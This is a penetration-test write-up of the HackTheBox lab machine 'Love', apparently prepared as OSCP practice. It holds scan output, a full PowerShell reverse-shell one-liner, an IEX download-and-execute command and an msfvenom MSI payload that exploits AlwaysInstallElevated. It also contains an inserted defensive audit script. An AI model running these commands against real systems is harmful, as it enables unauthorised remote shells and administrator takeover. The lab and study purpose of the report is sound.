1 - Love

/jorge-testa-ciberseguridad [email protected] https://jorgetesta.tech

Penetration Test Report

Love
A machine of: HackTheBox

$>_NO SYSTEM LASTS FOREVER.



TABLE OF CONTENTS

1 Pentesting report
1.1 Introduction ............ 4
1.2 Objective ............ 4
1.3 Requirements ............ 4

2 High Level Summary
2.1 Recommendations ............ 5

3 Methodology
3.1 Collection of information ............ 6

4 Penetration
4.1 List of Services ............ 6
4.2 Pre-exploitation ............ 8
4.3 Post Exploitation ............ 17
4.4 Additional Assets ............ 19

5 Cleaning the Traces



1 Pentesting report

1.1 Introduction
This report contains all the efforts that went into completing the HackTheBox Love machine.

This report will be scored from a point of view of correctness and completeness in all aspects of the
exam.

The objective of this report is to ensure that the student, in this case Jorge Testa, has a complete understanding
of the methodologies of a pentesting exercise, and to demonstrate that he also possesses the technical
knowledge necessary to successfully complete the OSCP certification, using this report as a model to
document the machines compromised in the different laboratories.

1.2 Objective
The objective of this installment is to perform an internal penetration test against the Love machine
from the HackTheBox network.

The student is tasked with following a methodical approach to gain access to the set goals.

This test should simulate a real penetration test and how it would be conducted from start to finish, including
the overall report.

1.3 Requirements
The student must complete this penetration test report in its entirety and include the following sections:

• Summary and general high-level recommendations (non-technical)
• Walkthrough of the methodology and detailed outline of the steps carried out
• Each finding with screenshots, guides, sample code and the corresponding flags
• Any additional items not covered by the above.

2 High Level Summary


Jorge Testa has carried out the task of conducting an internal penetration test on the target machine.
An internal penetration test is a simulated attack against internally connected systems.

The objective of this test is to carry out attacks similar to those of a malicious entity and to try to infiltrate
the internal laboratory systems of the target machine: HackTheBox.

Jorge Testa’s overall goal was to assess the network, identify systems, and exploit failures while doing
this report.

When conducting the internal penetration test, there were several alarming vulnerabilities that were
identified within the network. Jorge has had administrative level access to multiple systems.

The system was successfully exploited.

• 10.129.48.103 (Love):
Plain text credentials in the test platform and remote code execution via PHP (file upload without
restrictions), and privilege escalation thanks to a bad configuration of the AlwaysInstallElevated directive.

2.1 Recommendations
It is recommended to patch the vulnerabilities identified during the penetration test to ensure that a
real attacker will not be able to exploit such systems in the future. One of the important things to re-
member is that these systems need patches and updates, and once patched, they should remain under
the cover of a patching program to mitigate additional vulnerabilities that could be discovered at a later
date than this penetration test.

However, concrete solutions to those specific vulnerabilities are included in later sections.

3 Methodology
Jorge Testa has used a widely adopted approach to penetration testing that is effective in testing how
well the environment of the HackTheBox machine is protected.

Below is a breakdown of how the system was identified and exploited; it includes all the individual
vulnerabilities found.

3.1 Collection of information


The information gathering portion of a penetration test focuses on identifying the penetration test
range. During this test, Jorge was tasked with exploiting the test machine.

This report is based on the exercise called Love, which in turn has a machine under the same name, Knife,
belonging to the HackTheBox platform.

Difficulty: Easy

URL: https://app.hackthebox.eu/machines/344

4 Penetration
The steps carried out on the machine are described in detail below, together with the captures and/or code
used when operating on the system, as well as proofs of concept (PoC).

4.1 List of Services


The service enumeration of a penetration test focuses on gathering information from the services that
are active on the target system.

This information is of great strategic value for an attacker as it provides detailed information on potential
attack vectors on that target.

Understanding and knowing what applications and services are running on the system provides vital
information to an attacker before running the penetration test.

It is possible that in some cases some ports are not listed.

IP              Ports       Srvc/Banner   Version

10.129.48.103   TCP: 80     http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
10.129.48.103   TCP: 135    msrpc         Microsoft Windows RPC
10.129.48.103   TCP: 139    smb           Microsoft Windows netbios-ssn
10.129.48.103   TCP: 443    https         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
10.129.48.103   TCP: 445    smb           Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
10.129.48.103   TCP: 3306   mysql         -
10.129.48.103   TCP: 5000   http          Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
10.129.48.103   TCP: 5040   unknown       -
10.129.48.103   TCP: 5985   winrm         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10.129.48.103   TCP: 5986   winrm         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10.129.48.103   TCP: 7680   pando-pub     -
10.129.48.103   TCP: 49664  msrpc         Microsoft Windows RPC
10.129.48.103   TCP: 49665  msrpc         Microsoft Windows RPC
10.129.48.103   TCP: 49666  msrpc         Microsoft Windows RPC
10.129.48.103   TCP: 49667  msrpc         Microsoft Windows RPC

4.2 Pre-exploitation
Exploited Vulnerability:

Plain text credentials in the test platform and remote code execution via PHP (file upload without
restrictions)

Vulnerable System:

10.129.48.103

Explanation of the Vulnerability:

After obtaining the platform administrator's credentials through the misuse of the test platform found in
the "staging" subdomain, which the developers did not remove after the release of the application version,
it was discovered that the platform allows unrestricted file upload and file execution by uploading
malicious PHP files from the control panel, due to misconfiguration of directory permissions and file
uploads.

Privilege escalation vulnerability:

The vulnerability allows remote code execution, which in turn allows downloading and executing a payload
that provides access to a reverse shell as the user "Phoebe".

Vulnerability Solution:

Remove all traces of and access to the test platforms, correctly configure the permissions and access of the
directories, and implement proper file upload restrictions.

Severity:

Critical

Nmap report of all ports:

└─$ znmap 10.129.48.103

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after: 2022-01-18T14:00:16
| MD5: bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '10.10.14.139' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Issuer: commonName=LOVE
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-11T14:39:19
| Not valid after: 2024-04-10T14:39:19
| MD5: d35a 2ba6 8ef4 7568 f99d d6f4 aaa2 03b5
|_SHA-1: 84ef d922 a70a 6d9d 82b8 5bb3 d04f 066b 12f8 6e73
|_ssl-date: 2021-10-02T12:50:07+00:00; +21m50s from scanner time.
| tls-alpn:
|_  http/1.1
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

Nikto Report:

└─$ nikto -h http://love.htb


- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.48.103
+ Target Hostname: love.htb
+ Target Port: 80
+ Start Time: 2021-10-02 09:25:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...

Ffuf Report:

└─$ ffuf -w /usr/share/wordlists/onelistforallshort.txt -u http://love.htb -H "Host: FUZZ.love.htb" -fw 65


v1.3.1 Kali Exclusive <3


________________________________________________

:: Method : GET
:: URL : http://love.htb
:: Wordlist : FUZZ: /usr/share/wordlists/onelistforallshort.txt
:: Header : Host: FUZZ.love.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 654
________________________________________________

staging [Status: 200, Size: 5357, Words: 1543, Lines: 192]


[WARN] Caught keyboard interrupt (Ctrl-C)

Access to Administrator credentials:



Access to the application control panel:

Upload the PHP file for the RCE:



RCE demo:

Payload content:

# Nishang - Invoke-PowerShellTcpOneLine.ps1
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.139",9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Execute and download command:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.139:8000/shell.ps1')"

Getting the shell with a listener:



Flag screenshot test:



4.3 Post Exploitation

Privilege escalation vulnerability:

Bad configuration in AlwaysInstallElevated parameter

Vulnerable System:

10.129.48.103

Explanation of the Vulnerability:

The AlwaysInstallElevated directive causes Windows Installer to install any .MSI package with elevated
privileges, regardless of the user who launches the installation. By creating a payload with msfvenom that
contains the commands needed to create a user, the WinRM service can then be used to log in with that user,
who will have administrator privileges.

Vulnerability Solution:

Disable the AlwaysInstallElevated directive

Severity:

Critical

Registry query:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
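The registry query above checks HKLM only; the policy is abusable only when both the HKLM and the HKCU value are set to 1. The following PowerShell script is an added example, not part of the original report: it audits both hives, reports whether the host is in the exploitable state, and with -Remediate clears the setting (run it from an elevated prompt on the host under test).

```powershell
# Added example (not from the original report): audit and optionally fix the
# AlwaysInstallElevated policy. The setting is only abusable when BOTH the HKLM
# and HKCU values are 1; a single hive set to 1 is still a finding worth clearing.
param([switch]$Remediate)

$paths = @{
    HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($hive in $paths.Keys) {
        $value = Get-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or value means "not configured", which behaves like 0
        $state[$hive] = if ($null -eq $value) { 0 } else { [int]$value.AlwaysInstallElevated }
    }
    $state
}

$before = Get-AlwaysInstallElevatedState
foreach ($hive in 'HKLM', 'HKCU') {
    "{0,-4} AlwaysInstallElevated = {1}" -f $hive, $before[$hive]
}

if ($before.HKLM -eq 1 -and $before.HKCU -eq 1) {
    Write-Warning 'EXPLOITABLE: any user can install an MSI with elevated privileges (the state found in this report).'
} elseif ($before.HKLM -eq 1 -or $before.HKCU -eq 1) {
    Write-Warning 'Partially configured: one hive is set to 1; not exploitable on its own, but it should be cleared.'
} else {
    'OK: AlwaysInstallElevated is disabled or not configured in both hives.'
}

if ($Remediate) {
    foreach ($hive in $paths.Keys) {
        if (-not (Test-Path $paths[$hive])) { New-Item -Path $paths[$hive] -Force | Out-Null }
        Set-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
    $after = Get-AlwaysInstallElevatedState
    "After remediation: HKLM={0} HKCU={1}" -f $after.HKLM, $after.HKCU
}
```

Writing to HKCU from the script only affects the hive of the user running it; the durable fix is to set "Always install with elevated privileges" to Disabled under both Computer Configuration and User Configuration in Group Policy so that every user's hive is covered.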

Creating the exploit with msfvenom:


└─$ msfvenom -p windows/adduser USER=r00ted PASS=P@ssword123! -f msi -o r00ted.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 274 bytes
Final size of msi file: 159744 bytes
Saved as: r00ted.msi

Download the exploit:


Invoke-WebRequest "http://10.10.14.139:8000/r00ted.msi" -OutFile "C:\Users\Phoebe\Desktop\r00ted.msi"

Installation of the package with the payload:


msiexec /quiet /qn /i r00ted.msi

Access with evil-winrm:


evil-winrm -u r00ted -p P@ssword123! -i 10.129.48.103

Flag screenshot test:



4.4 Additional Assets


No additional assets were found.

5 Cleaning the Traces


This final step ensures that all remains of the penetration test are completely removed.

Often times, snippets of tools or user accounts are left on the system of an organization that has just
passed a penetration test.

These ‘leftovers’ can cause security problems down the road.

Being meticulous and not leaving traces of our tools and/or tests from the penetration test is a task of the
utmost importance.
